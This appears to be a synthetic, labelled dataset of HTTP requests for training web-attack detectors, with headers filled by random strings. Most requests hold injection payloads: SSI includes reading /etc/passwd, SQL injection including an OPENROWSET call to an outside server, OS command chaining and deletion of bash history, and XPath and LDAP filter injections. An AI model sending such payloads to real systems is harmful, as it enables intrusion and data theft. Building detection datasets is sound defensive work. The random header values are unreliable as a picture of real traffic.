Max-Forwards: 8
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: Basic dGljdGFyNDg6dnJHeg==
Range: 127-39590,86298-2
Referer: http://www.rmui.com/ehiqnny/sv9r/kTuan/Ens3adee/Eftaak1.cfm
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ecqtpe (l6Q26l; rZnJmvK1j; eFizdx4LW)
UA-CPU: MIPS
UA-Disp: 753,986,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: 9.6 157.136.168.93, 5.0 10.93.22.13:4541
Transfer-Encoding: gzip
Upgrade: a9cprh/8.7, srOnp/9.8, ewp2o/0.8
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47033
Start - Id: 39440
class: SSI
GET /qgZ7_gim0/FuoatotlhnbNiisamE/7wGziszjliqiSHRy/elrediEfw/2nsttrmaBro/ajaat/8qjjkEmDe/gottrloeovmtponupr/t.sJkY8V6c9BGJ/rEemrkirfsrhehth2/q3heWqF.mdb?itescrneaecmsa=27293527&gatse=j-E1&VYanieo01=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&nNErno=927289 HTTP/1.0
Host: www.e0enas.cz
Connection: keep-alive
Accept: text/plain, text/plain;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 33.166.94.235
Cookie: idazxshl=aepl4shsi;spy2wecEunJrh=qtuS;ri6c=h5mi;y6HorbodyXIWmV=rFNqn-2P;53shtt=58060
Cookie2: $Version="44"
Date: Sat, 17 Feb 07 03:26:34 GMT
ETag: W/"g-ksgTJnyj4@HQLJR7_n"
Expect: 100-continue
From: 1y6tgnnt@o4or4ie9a.com
If-Modified-Since: Tue, 09 Dec 08 01:35:34 UTC
If-Unmodified-Since: Wed, 06 Aug 08 20:14:23 UTC
If-Match: *
If-None-Match: *
If-Range: "ghcvZRmM6m1@HUw4zXuo"
Max-Forwards: 50
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Digest opaque="nlchkwo"
Range: 73-4339,804-,5553-97644
Referer: /eeL1Nr5/xYed/tgorp/nnxtVdg.msf
TE: gzip;q=0.9,trailers,deflate;q=0.7
Trailer: Authorization
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 3.0; 7b-sl; rv:9.8.5) Gecko/80442205
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 592x7670
Via: HTTP/7.6 249.95.55.166, FTP/5.7 www.nDTt.png
Transfer-Encoding: gzip
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Forwarded-For: 250.217.107.185
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39440
Start - Id: 35452
class: SqlInjection
POST /XlVNExprocessing-instructionqvh/e6DhukUz/s3Bsl-p/sf60cgrEfWaF/eSg/P5VAuZqn_fnullo/ipD2wMyXKGQ.7Idy8eEl/uFjTI-tO612arF.sh? HTTP/1.1
Content-Length: 208
Content-Language: i,mJaees
Content-Encoding: deflate
Content-Location: http://8muis.be/giu0Anl/vejes/aodojas.nsf
Content-MD5: c25vdHZ2Y2hvc3VleHZjdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 May 07 17:56:31 UTC
Last-Modified: Wed, 19 Sep 07 13:25:24 CET
Host: 33.219.56.254
Connection: close
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, gzip;q=0.7, deflate, deflate;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-age=273
Client-ip: 17.114.30.62
Cookie: Lthasreeg9oCs=e]eqgrchLutr;jbf1fa=and  0<>(select count(*) from   aeqlr   where    tRalhcc<>)
Cookie2: $Version="8"
Date: Wed, 25 Jun 08 15:12:35 GMT
ETag: W/"kAFCpgl.doSj.xaZIyq"
Expect: 100-continue
From: CiEact@jfre.it
If-Modified-Since: Sat, 17 Oct 09 21:34:12 GMT
If-Unmodified-Since: Thu, 06 Jul 06 20:58:37 GMT
If-Match: "OJ4yFXxNGJzm_l48"
If-None-Match: "0RPHD9DpqZGMJPB95V"
If-Range: Wed, 20 Feb 08 20:58:58 CET
Max-Forwards: 63
Pragma: its='testa'
Authorization: Basic NW8waDplZWxnYWFl
Referer: /MZaoS/tnNhOe/wdIe2/bnmDassh.cgi
TE: deflate,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.2 (compatible; n2oGe; Linux i386; tapuR; USqiR; suetnt97)
UA-Disp: 259,478,16
Via: FTP/8.6 98.37.139.181
Warning: 433 142.224.31.47:66 "3t6fta" 
X-Forwarded-For: 142.47.121.158
X-Serial-Number: 8721257248

binwhereEReAg=aphit&nrgawetEesi=sQnaNxTnls0ngpa&diOefueb=85&c1jcopy3l=9DbziPZ27&.2SlinkowDUiQ=bd-teab ba9&3oti45=:enspositiont0as[Qhomedbwget&zeezrh=Ea=hmetmbetweenwgetuor-&OqrGnDgFJ4=amar-&4ek=95415221

End - Id: 35452
Start - Id: 39591
class: SSI
GET /oP2DQU.-Uci-/myH.9S3cHCihVp1bZ/dp/eoisneeeln4wpwoU4lee/dD0zziR/Cs/nhtjn9ltnstt/ry/aesmiIe/2da9edt/yopeneX.dll?irtAyiRsqal=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&htcpyagztesftap=aewp-t+%2FnuM&iuhdN=7h%3Ceeey HTTP/1.1
Host: www.lneI.fr
Connection: rXios
Accept: */*;q=0.0
Accept-Charset: iso-8859-5;q=0.1, euc-kr, iso-8859-1;q=0.8, ks_c_5601-1987;q=0.5, windows-1251
Accept-Encoding: 
Accept-Language: cmiote-dr
Cache-Control: max-age=138
Client-ip: 239.19.170.214
Cookie: oDIu=092979112
Cookie2: $Version="5"
Date: Thu, 25 Oct 07 11:48:13 GMT
ETag: "YVC3VkK4ypDbvG-NGs"
Expect: etree
From: szEete@ence.uk
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Sat, 17 Oct 09 15:42:24 UTC
If-Match: *
If-Range: Sat, 26 Mar 05 10:50:56 CET
Max-Forwards: 14
MIME-Version: 2.2
Pragma: eeh='eInew'
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /aidS/gle7/eoeotwan/eyel9.bin
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.1 (compatible; eu8q; Mac OS X; ensirht)
UA-Disp: 7073,179,8
UA-OS: Win98
Via: eltSs/2.3 48.123.178.187, 4.0 148.252.199.132
Transfer-Encoding: deflate
Upgrade: oshili/5.5, wen/5.9
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39591
Start - Id: 43827
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: 69.135.190.54:7472
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: identity, deflate, compress;q=0.5, gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 73.78.71.34
Cookie: raddtpntme6otp=dns6unnohlimsamteo;d5=4ajtae
Cookie2: $Version="87"
Date: Wed, 06 Oct 04 07:39:20 UTC
ETag: W/"G6D2lj57hoqX41I4IgL"
Expect: 100-continue
From: nNdc@ioesest.fr
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Tue, 20 Oct 09 06:48:05 CET
If-Match: "NK3rOA-0JT6ThHP4"
If-None-Match: "3VhEIW_17V@_HlM"
If-Range: Fri, 06 Apr 07 03:37:59 GMT
Max-Forwards: 4066
MIME-Version: 9.7
Pragma: hm1ismir=u0Hafm
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM aEVoNnM0U2EwMDZudG9XYXRzaG1oZW1zcnBlZWJ6ZWl0
Range: -694,-90120,-768
Referer: /eihn/am0redi/sdznhld/llwrla/u4cai.avi
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.2 (compatible; Konqueror/4.4; Open BSD i386; fUnattetg; Pfyde0o)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6925x167
Via: 9.8 4.246.171.36
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 179501201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43827
Start - Id: 42789
class: SqlInjection
PUT /nncPfLF0d9Hxp_/egK/Nwp-oXRxp_evalRxtermopenf0d/fW5l_xBOq1V/pTynw8tahs5peIa6i/rrelhvr7/usbtam4/JNMt23/mostdin/lMl0/e-LAA/nHfsz.o.k.png? HTTP/1.0
Content-Length: 296
Content-Language: nrehAeH,eeIiome,istoitl
Content-Encoding: deflate
Content-MD5: dTBoZWxlbG9zbm9tQmV1Zg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 26 Dec 05 14:07:02 GMT
Host: 0.224.6.161:80
Connection: gaur
Accept: application/x-tar
Accept-Charset: iso-8859-6
Accept-Encoding: deflate;q=0.7, compress;q=0.3, identity;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 106.46.255.142
Cookie: IrelDe=r%ieph:d it5anan;RtP31W='  OR ''   =   ';tvvVHBvWbetc.o=220566
Date: Fri, 23 Jun 06 15:36:55 UTC
ETag: "cgY.nDUdJO7yjzxPF_"
If-Unmodified-Since: Thu, 08 Dec 05 15:52:53 CET
If-Match: *
If-None-Match: *
Max-Forwards: 16
Proxy-Authorization: Basic Y2RhQWlpUmY6Mm5PY2h3dHA=
Authorization: Basic YTZrbmk6bmludGlwMnQ=
Referer: http://www.n5fvh.biz/smdsr/inei02qt.php3
User-Agent: Mozilla/7.9 (Windows; U; WinNT 6.5; aS-uw; rv:1.2.7) Gecko/52434078
UA-Disp: 5034,6041,16
UA-Pixels: 952x987
Transfer-Encoding: identity
----: --------------------

nii=iframeb sabwee4tA2$&mfFkeH_=metahomeesusock_streaminvebn2i0&pteuwchvl=1646&tcagzttLrl=y_40v5&assxhwhguet6y=u.Dq&saseoso=processing-instructionEoonartftpes&nn9dassn=39&hXet8ew5tet=%&Dt= ieec&yAqndA=3n4thnMOAlhr&tEto= \0&sdc6nsd8= it nvaia&aEs=neInhShnhtihaj&rieiRroenea=9078&Sz4JQ1=aPS5r

End - Id: 42789
Start - Id: 43494
class: OsCommanding
GET /aJTrk3dtbGSrRXctls3/b33wS_/ool77R/hBrp0IoNfmsYSjeyS/mk63fRKRgl0HdwiQdJX/rCEEH6nxb91uJHIkR@.mspx?aooaetnmnecg=1089&Jm3VbCdWETS=ywehtacces%29eat5&ju7ehAFuXE=n&body2.hbodyW=155554&wdrs2Aem=1e0+gtcefEaoptayt&aR9styrdeaRlIg=nc%24d&tkotn=75645680&optOrmp=5-rn+iincludee+%3Eecho+princludesto&teaa2=odSnysuauo&DXwMtyffpyJB=zeSmlu%3Ddccpassthruz&a9cea=tdgD&eued=095&mMPSYEtqc=8&9jMZyeF=%27+++%3B++rm+++++%7E%2F.bash_history+%3B&whns=v+mail HTTP/1.0
Host: www.eoirwCr.com
Connection: 4H3r
Accept: application/postscript
Accept-Charset: iso-10646-ucs-2, x-mac-icelandic;q=0.1, x-mac-korean;q=0.9, x-mac-icelandic;q=0.9, x-mac-arabic
Accept-Encoding: deflate, identity;q=0.8, deflate, deflate
Accept-Language: *
Cache-Control: ee0rsh=a8ite
Client-ip: 135.38.176.126
Cookie: tlm=hs0aCroephpunbaservices;licbo=execos+<ss;0actacceptld;edsDwnl=46;ttpsr5Im=2laitn9e;ohlktcuoaqbeac=wonefH88privoBw;moesoecihzch=opcspq0eitczoi402
Cookie2: $Version="514"
Date: Wed, 19 Nov 08 11:19:33 UTC
ETag: W/"uhZCKDWcmyXWFNL"
Expect: 100-continue
From: fxtr5UaD@nYeuiAuhet.net
If-Modified-Since: Tue, 20 Oct 09 01:53:04 GMT
If-Unmodified-Since: Fri, 15 Feb 08 13:32:10 CET
If-Match: *
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 1
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM c3hyaU5lc3JmeWV0dmVheW1oZXRudGhlOGNSaEVQYWd0YjdsaGdpdHNlZXMzcnFv
Range: 32-61,4386-85
Referer: /stin6/aor6mo/aInn.jpg
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/0.3 (Windows; U; Win98 1.8; sa-ar; rv:2.9.1) Gecko/26107483
UA-CPU: Sparc
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: FTP/2.4 www.ndtjspt.js:7902, FTP/9.9 116.208.122.244, 6.9 28.82.107.166
Transfer-Encoding: compress
Upgrade: oifjE/4.1, rq7t/9.9, yvbed9/8.5
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43494
Start - Id: 49839
class: XPathInjection
GET /cendpcno/ccDcCd@dxaz4/a8_0.tiff?whlao1hefn=14684612&amNdeyKgc=sssnsOh7a&toosDld=zctia&fcunos5iistXdia=hHe4%3A&NsjotrfaveecS=710501&oh=xu%245&tcalSemhspwd=Abvinal4ieuslscsv&enh=2643088&s7hfhny=glu%27+++++or+1%3C++igo%2Fae%2Fnwxgme%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D++or+++%27hnr%27%3D%27&hbhni6trErttlt=%26%3A%26nct&4S5Kl=0324611733&bmh=rns8betweenTbetweenk&G5NMmails=s0PpByS HTTP/1.1
Host: 192.121.47.40
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=3
Client-ip: 146.101.131.153
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Sat, 31 Jul 04 12:20:10 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: 100-continue
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Sat, 16 Dec 06 07:30:04 GMT
If-Unmodified-Since: Sat, 02 Dec 06 21:21:14 CET
If-Match: *
If-None-Match: "elVg-LEun28OJ@h-"
If-Range: Wed, 08 Nov 06 06:35:22 CET
Max-Forwards: 737
MIME-Version: 4.3
Pragma: roe0s5=sowoR
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: shTa ehe54fha=rlugc
Range: 376648-,445-
Referer: /4eiy6h1/Ne3gtr0/heVn/ienttSrl.txt
TE: trailers,deflate;q=0.4
Trailer: Accept
User-Agent: prEabr
UA-CPU: 68000
UA-Disp: 1489,6295,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: qtplca/7.0 www.he6tWdg5.gif
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49839
Start - Id: 41281
class: SqlInjection
GET /y3i4FfowOSafMW9/RHxwhere/zARatoaYnonfus/smrueoedhDre/r2.css?nso=6&NshY=txsbmz4&vuSjotsfo=replace%3Edymnwget+ja%26oadmin&kmZinyts=Ghaving&Oaw0Aaosshecse0=4055929&NutIthAy6=s3etppvlrw&nwxV8tci=at&AkelajcajsehnW=ooannhim5gz&fme6estas2e=s&sxntwff7o=6867&qMTElMI5=%24Tcsk&naor=%5BR&gueofNe=3ralzhre%28cu%5Bn%3B&etddaTo=0571867&u0K8bdR=a82to%7Ew%27%3Cod HTTP/1.0
Host: www.oilunx.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, ks_c_5601-1987;q=0.5, euc-kr;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: sfhrf='cv8'
Client-ip: 112.60.226.144
Cookie: ifoaanjvcnin=;   insert    into  OPENROWSET(   'SQLoledb','uid=eur;pwd=ileOy;Network=DBMSSOCN;Address=154.51.150.178,1433;','select     *     from _sysdatabases'    );     select *  from   LinkedOrRemoteSrv1.master.dbo.sysdatabases
Cookie2: $Version="7"
Date: Tue, 14 Apr 09 23:17:40 UTC
ETag: W/"DRkLwuvu5ed6v-FEJe"
Expect: eS7sisri
From: ro7Ie@oae4.net
If-Modified-Since: Sun, 01 Jul 07 11:48:04 CET
If-Unmodified-Since: Tue, 20 Apr 10 24:00:13 GMT
If-Match: "G-Vfzxy1L23Eudn@uC"
If-None-Match: *
If-Range: "44fZmDS5VELLVR5uMCI"
Max-Forwards: 81
MIME-Version: 9.5
Pragma: seha=kthsx7J
Proxy-Authorization: deoa hlT7nho7=cepy
Authorization: NTLM djBlcG5oNmFkbnRFRXA5dGhuY2h3bWVkd3RocWhkbWVlOHlobHVzamFuM2VveA==
Range: 2-,-01
Referer: http://twii.cz/emmoz/Dsrd.png
TE: trailers,trailers
Trailer: Via
User-Agent: ea4r (oh8uBrtCq; aXXE@MdmHA; wtUhjlDNT; 9DPitK-fdT)
UA-CPU: StrongARM
UA-Disp: 9589,777,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1296x4154
Via: 9.6 www.5nseruo.png, 1.8 www.eamtr.html
Transfer-Encoding: identity
Upgrade: ieqh/0.4, 4uiue/9.2, dPM/0.9
Warning: 508 173.118.96.237 "ut41etivanEyTVEyeh" "Mon, 08 Jun 09 03:39:08 GMT"
X-Forwarded-For: 7.111.55.106
X-Serial-Number: 489994179752
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41281
Start - Id: 49929
class: XPathInjection
GET /edB/igB4Aq/nsEexitlcLqrioao/abTtPt7frraGti/oF-havingin.DJi/replaceNSxf-DS52PXQw/imm.cfm?3entlqtr6e2h=er+cfo&gknadOiortqond=-doheselect94aje&rrAypHae=tao5prajSefm&r0hyPeitt7bpnqa=c%3Clsm&IQgPPgxjJ6link=T3whae+k&slearctElyd2j=6631752703&meu9auhtraAReae=7shutdowncsMjfnuihttpseNdn+oie&_NgQGyqMi=621445&Enka=6cm00&Hs9otk1=%28i+%3C+++count%28hafc%2Fchild%3A%3Atext%28%29%29+++and+++++j+++%3C++++count%28es8r%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++%3C+count%28eii%2Fchild%3A%3A*%29++%29&oroaaldraLhn=709402 HTTP/1.1
Host: 117.177.238.118
Connection: keep-alive
Accept: application/*, application/rtf;q=0.9, audio/x-wav
Accept-Charset: x-mac-cyrillic;q=0.6, iso-8859-8-i;q=0.3
Accept-Encoding: 
Accept-Language: d-n, ehieo-lm;q=0.1
Cache-Control: max-stale
Client-ip: 69.149.110.120
Cookie: eb7ghetee7mio=3t
Cookie2: $Version="5"
Date: Tue, 29 Aug 06 02:33:16 GMT
ETag: "mbvNrZbGQe@lb2Qziq"
Expect: Jkevnixq
From: cbithw@teurCy.cz
If-Modified-Since: Tue, 20 Jan 09 05:31:29 GMT
If-Unmodified-Since: Sat, 03 Jan 09 17:25:51 GMT
If-Match: *
If-None-Match: *
If-Range: "9NtuvThsKoOxD9B6dr9z"
Max-Forwards: 905
MIME-Version: 9.8
Pragma: aty=op
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: 53346-
Referer: /dheEn.doc
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 4.8; en-ea; rv:4.5.4) Gecko/24392200
UA-CPU: MIPS
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: deflate
Upgrade: qfe/8.0
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49929
Start - Id: 49974
class: XPathInjection
GET /sazmj_rjMR4@/dssrantD7sisEi7/7Dkf2OvrlZVb/uJkua4NQXal-v@CF4.sh?efyojoGtsoa=qp%4029&ehcwunecta=teicfg&ne2n=o&qefal7rpSew=aeindn2%2Fbeoctoh&eIiefsRewr=Mn7sEm%27+or++6+++++%3C++++count%28path%2Fchild%3A%3A*%29+or++++%27ot%27+++%3D+++%27&eunIbW3fsie=tseahttpsycLn2&eacnxcicrst6or=60197 HTTP/1.1
Host: 76.34.74.135:1792
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-3, x-mac-ce;q=0.0, shift_jis;q=0.2, windows-1255
Accept-Encoding: deflate;q=0.2
Accept-Language: *;q=0.9
Cache-Control: min-fresh=2
Client-ip: 85.90.171.108
Date: Thu, 20 Mar 08 21:47:22 UTC
ETag: W/"j_9d8nENb2Gi6G5"
Expect: ahthray
From: aihryej@wvtazei.be
If-Modified-Since: Sun, 02 May 10 11:53:37 CET
If-Unmodified-Since: Wed, 03 Sep 08 03:02:53 GMT
If-Match: "NCIoqX_liYB_xXW107AD"
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 8
MIME-Version: 0.0
Pragma: pshua9=b
Proxy-Authorization: Digest cnonce="drtr"
Authorization: Basic c2huZTp1bWl0OG8z
Referer: /htGb0u.bin
TE: trailers
Trailer: Accept-Encoding
User-Agent: aOac/3.7.8.1.0
UA-CPU: 68000
UA-OS: Linux
Via: 9xss/2.8 www.eteYr.png, evto/4.1 www.nqdee.jpg
Transfer-Encoding: gzip
Warning: 373 www.dycegetI.js "ud0n" "Sun, 04 May 08 18:18:10 CET"
X-Serial-Number: 6790519632
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49974
Start - Id: 37077
class: LdapInjection
GET /yJ/e4stdv2trOotsonxlb/xtsH/oAgoBmbgmJs/nsantnteeVidvl6hU/9GKO4/nVwn2jSJGJFfhFvQfz/sTn2sVLYDCVuh-C06l/iq/tsock_streamGhw0like/iGChAgsyc/4_O.B.X.cgi?nfn24kwurbe=83%29%28%26%28objectClass%3Den7s%29%28%7C%28sn++%3D++++srw%29%28cn%3Dr++J*%29%29&ota0e6own=5293&sgt3scw=+0nTinuc HTTP/1.1
Host: 106.63.22.181
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1253, x-mac-hebrew;q=0.8, gb2312, windows-1250
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: rtO62an1=rthEoae
Client-ip: 172.225.76.42
Cookie: oaaoGo3a=enFsfxa;ed8pi=79;geNlrolut=630000523;lauee=$hdrmlqnph-6;cenodeurll7etjR=h4deletedrcphhsemewdo%4lc;0niis30ae9OhtLn=0195800899
Cookie2: $Version="5"
Date: Wed, 27 Sep 06 19:00:25 UTC
ETag: W/"zR2bnbCyHzSTSPyyxC"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Sat, 27 Oct 07 04:44:57 GMT
If-Unmodified-Since: Fri, 02 Mar 07 12:44:31 CET
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 99
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic c2V3aWM6TmFhc2U=
Range: -5
Referer: http://vrim.uk/vltdoae.nsf
TE: gzip;q=0.3
Trailer: From
User-Agent: 6WRjNE@_UJ http://www.dnrso.cz
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: snrtf/1.5 www.n6223kte.png
Transfer-Encoding: compress
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 4.45.247.215
X-Serial-Number: 252851
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37077
Start - Id: 39244
class: SSI
GET /lpOPP_TaYin6Dhk.js?skDee=%27s%27ael%29edobjecte%7Ct&a0doh=%3C%21--%23email+fromhost%3D%22www.ane0ydh.com%22+tohost%3D%22mailbox.1Nmgd.com%22+message%3D%22arNv+uaitgl+eemoto+shltoe%22+fromaddress%3D%22tcti42.com%22+toaddress%3D%2212ler.7eh.com%22+subject%3D%22cee%22+sender%3D%22t6.com%22+replyto%3D%22kf0ijs.com%22+cc%3D%22ets%22+inreplyto%3D%22ceu+eaoi+ti%22+id%3D%22vf8asmail%22+--%3E&7mo2tinujephn=t2&oiht=5358198850&ejxnmpixherad=600007200&N40vwgetUJD=+i+rTd2autoexecdosystemse%3C HTTP/1.1
Host: www.iadnen.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ettr-do, 5Ias3og-uau;q=0.1
Cache-Control: no-cache
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="7"
Date: Sun, 03 Jun 07 06:52:53 CET
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Thu, 15 Nov 07 11:25:15 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: *
If-None-Match: *
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 224
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest qop=auth
Range: 5-9725,-6683
Referer: /spotkbe/Nelae/seOt5ho/estsset9/tdle.jpeg
TE: deflate,trailers,gzip;q=0.7
Trailer: Range
User-Agent: Mozilla/7.7 (compatible; Konqueror/8.1; SunOS sun4u; yoo17mre; d4n8cmioPu; oiwols)
UA-CPU: PowerPC
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: HTTP/3.4 www.8dlnixe.tiff:5
Transfer-Encoding: deflate
Upgrade: ueiyd/3.1, tac/2.4, eiz/0.3, isofl/2.9, eutR/4.6
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39244
Start - Id: 38965
class: LdapInjection
GET /ee/Dvqqraeitog4/eClearrek/qprlci8q..Z4pL/BincludeFh/eUJGwSRCcIs3wKMo-/aetsahneo8aMwfrt/nmhNggdCwo_YAaD.o/immsewk/ghp0eNicnere8beqt/a7.aspx?nneepehe=1&Ukh2svn2c=norRlH%3A6Eohz&B7u_cp=iPZyigAQ&lo=1252&oi1AhiawirhoNed=o9z8H&Fc-r0Upositionfk6id=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ot7s=68010486&tgHRy1htcdqj8=iad&vpepddlo=+netcatcsb&tua=343793913 HTTP/1.1
Host: www.eiSexN6n.st
Connection: close
Accept: application/rtf, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: utulera-dd;q=0.3
Cache-Control: no-transform
Client-ip: 65.168.89.85
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="2"
Date: Sun, 22 Jan 06 16:15:04 UTC
ETag: "UHQB-TkfNTVLF8xK"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Thu, 24 Apr 08 12:29:45 CET
If-Unmodified-Since: Thu, 31 Mar 05 18:15:08 UTC
If-Match: "l2lCjGHg3TNbA0MV"
If-None-Match: "1DJXBMT7kEwU@7tZ@vQ"
If-Range: "vDWG5BbUkt0NAYk"
Max-Forwards: 082
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -5662,0-2168
Referer: http://www.Ne3Rfe.biz/qteeruFt/ceeO/siesy/oe6n6/bsoB.msf
TE: deflate;q=0.8,chunked
Trailer: If-Match
